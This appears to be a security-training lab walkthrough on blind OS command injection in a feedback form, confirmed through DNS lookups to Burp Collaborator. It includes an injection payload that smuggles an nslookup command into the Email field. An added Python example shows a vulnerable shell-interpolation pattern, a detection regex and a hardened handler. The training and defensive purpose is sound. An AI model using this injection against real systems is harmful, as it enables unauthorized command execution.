Blind OS command injection with out-of-band interaction

Last updated 5 months ago

Lab Description

Walkthrough

Step 1: Understanding the Feedback Functionality

The Submit Feedback page contains four input fields:

  • Name

  • Email

  • Subject

  • Message

Our goal is to test whether these fields are vulnerable to command injection by leveraging out-of-band (OOB) interactions via DNS lookups to Burp Collaborator.

Step 2: Intercepting the Feedback Request

Using Burp Suite, intercept the HTTP request when submitting feedback. The intercepted request will contain parameters corresponding to the form inputs.

Objective: Modify one of these parameters to execute a payload that triggers a DNS lookup to Burp Collaborator.

Step 3: Crafting and Injecting the Payload

In the Email field, inject the following payload:

||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||

This payload triggers a DNS lookup for the subdomain generated by Burp Collaborator, confirming that the server executes commands.

Payload Breakdown:

  • ||: A shell command separator; it terminates the original command so the injected command runs after it.

  • nslookup: A command that performs a DNS lookup for the hostname it is given.

  • x.BURP-COLLABORATOR-SUBDOMAIN: The hostname to resolve; substitute the subdomain generated by Burp Collaborator so the lookup can be monitored there.

Submit the request with the modified payload.

  • The server responds with 200 OK, indicating the payload was executed.

Step 4: Verifying Out-of-Band Interaction

Switch to the Burp Collaborator tab and click Poll now.

  • Observe DNS requests generated by the server to your subdomain.

Why Use Out-of-Band Interaction?

When the server does not return command output or write it to an accessible location, OOB interaction is the best way to verify that a command was executed. DNS lookups leave a trace on external systems, enabling confirmation of blind vulnerabilities without requiring direct output.
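As an added illustration (not code from the lab or from this writeup), the Python sketch below puts the flawed pattern behind this class of bug next to a hardened handler and the kind of check a request-log scanner or WAF rule can apply. The `mail` command, the `/tmp/feedback.txt` path and all function names are assumptions; the lab's real back end is not shown anywhere on the page.

```python
import re
import subprocess

# Constructed sample input: the lab payload as the server sees it after URL
# decoding ('+' in the form body has become a space).
LAB_PAYLOAD = "||nslookup x.BURP-COLLABORATOR-SUBDOMAIN||"

# Metacharacters that let a value escape the intended command in a POSIX shell.
SHELL_META = re.compile(r"(\|\||&&|[;|&`\n]|\$\()")

# Deliberately strict: a plain local@domain address, nothing a shell can reinterpret.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def vulnerable_command(email: str, subject: str) -> str:
    """Hypothetical flawed back end: user input is interpolated into a string
    that will be handed to `sh -c`, so `||` is parsed as a shell operator."""
    return f"mail -s '{subject}' {email} < /tmp/feedback.txt"


def looks_like_injection(value: str) -> bool:
    """Detection check for a form field: does it contain shell control syntax?
    Blind injection gives no error in the response, so flag the request itself."""
    return SHELL_META.search(value) is not None


def safe_argv(email: str, subject: str) -> list:
    """Hardened form: validate strictly, then build an argument list so no shell
    ever parses the input; a `||` would reach `mail` as a literal argument."""
    if not EMAIL_RE.fullmatch(email):
        raise ValueError("rejected: not a well-formed email address")
    return ["mail", "-s", subject, email]


def send_feedback(email: str, subject: str, body: str) -> int:
    """Runs the hardened command without shell=True; returns the exit status.
    Requires a `mail` binary on the host, so it is not exercised below."""
    proc = subprocess.run(safe_argv(email, subject), input=body.encode(), check=False)
    return proc.returncode


if __name__ == "__main__":
    print("shell string the flawed handler would run:")
    print("  " + vulnerable_command(LAB_PAYLOAD, "feedback"))
    print("flagged by detection check:", looks_like_injection(LAB_PAYLOAD))
    print("hardened argv for a valid address:", safe_argv("alice@example.com", "feedback"))
    try:
        safe_argv(LAB_PAYLOAD, "feedback")
    except ValueError as err:
        print("hardened handler on the payload:", err)
```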